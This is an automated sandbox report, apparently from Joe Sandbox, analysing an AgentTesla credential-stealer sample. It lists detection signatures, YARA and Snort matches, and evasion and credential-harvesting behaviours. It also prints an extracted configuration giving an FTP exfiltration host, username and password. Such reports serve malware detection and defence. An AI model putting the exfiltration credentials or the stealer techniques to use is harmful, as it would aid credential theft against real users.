Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
Analysis ID:1459875
MD5:64073b255ae31ff074cb796d8863bce3
SHA1:98a21169f0ea27a70b0a456b0d3e9bf3fe018014
SHA256:1b42d958ccd31edd5a5839eaa6744c3d07d3708dcbc38f4b683d89e1f85dde2c
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3119b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3120d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x31297:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x31329:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x31393:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x31405:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3149b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3152b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2e6d0:$s2: GetPrivateProfileString
                  • 0x2ddf2:$s3: get_OSFullName
                  • 0x2f387:$s5: remove_Key
                  • 0x2f524:$s5: remove_Key
                  • 0x3040e:$s6: FtpWebRequest
                  • 0x3117d:$s7: logins
                  • 0x316ef:$s7: logins
                  • 0x34400:$s7: logins
                  • 0x344b2:$s7: logins
                  • 0x35dba:$s7: logins
                  • 0x35056:$s9: 1.85 (Hash, version 2, native byte-order)
                  2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    No Sigma rule has matched
                    Timestamp:06/20/24-07:24:18.598870
                    SID:2851779
                    Source Port:49737
                    Destination Port:47602
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/20/24-07:24:18.182738
                    SID:2029927
                    Source Port:49735
                    Destination Port:21
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:06/20/24-07:24:18.598870
                    SID:2855542
                    Source Port:49737
                    Destination Port:47602
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    AV Detection

                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeAvira: detected
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.wapination.net", "Username": "pop@wapination.net", "Password": "sync@#1235"}
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeReversingLabs: Detection: 28%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeVirustotal: Detection: 39%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeJoe Sandbox ML: detected
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Networking

                    Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.4:49735 -> 108.179.234.136:21
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49737 -> 108.179.234.136:47602
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49737 -> 108.179.234.136:47602
                    Source: global trafficTCP traffic: 192.168.2.4:49737 -> 108.179.234.136:47602
                    Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                    Source: unknownFTP traffic detected: 108.179.234.136:21 -> 192.168.2.4:49735 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 6 of 150 allowed. 220-Local time is now 00:24. Server port: 21. 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: ftp.wapination.net

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, SKTzxzsJw.cs.Net Code: Fe9wfWKc5
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, SKTzxzsJw.cs.Net Code: Fe9wfWKc5

                    System Summary

                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, Login1.csLarge array initialization: : array initializer size 582181
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1784260103.0000000004267000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1783310566.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000000.1733361087.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameYQOT.exe. vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1783809425.0000000003031000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1790725418.0000000008000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1791655061.0000000008090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2983044839.0000000000F98000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2983662902.0000000001428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename5e940590-bd07-4e56-ae86-61e052f8ff28.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeBinary or memory string: OriginalFilenameYQOT.exe. vs SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.405d6f8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4097b18.0.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.43e54e8.1.raw.unpack, fPvgG7swuttoZXeUIZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.8090000.8.raw.unpack, fPvgG7swuttoZXeUIZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, EZIYEA9L2ILVpWmM2J.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.4461308.3.raw.unpack, fPvgG7swuttoZXeUIZ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.log
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeMutant created: NULL
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeReversingLabs: Detection: 28%
                    Source: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeVirustotal: Detection: 39%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe:Zone.IdentifierJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exeSection loaded: dnsapi.dllJump to behavior
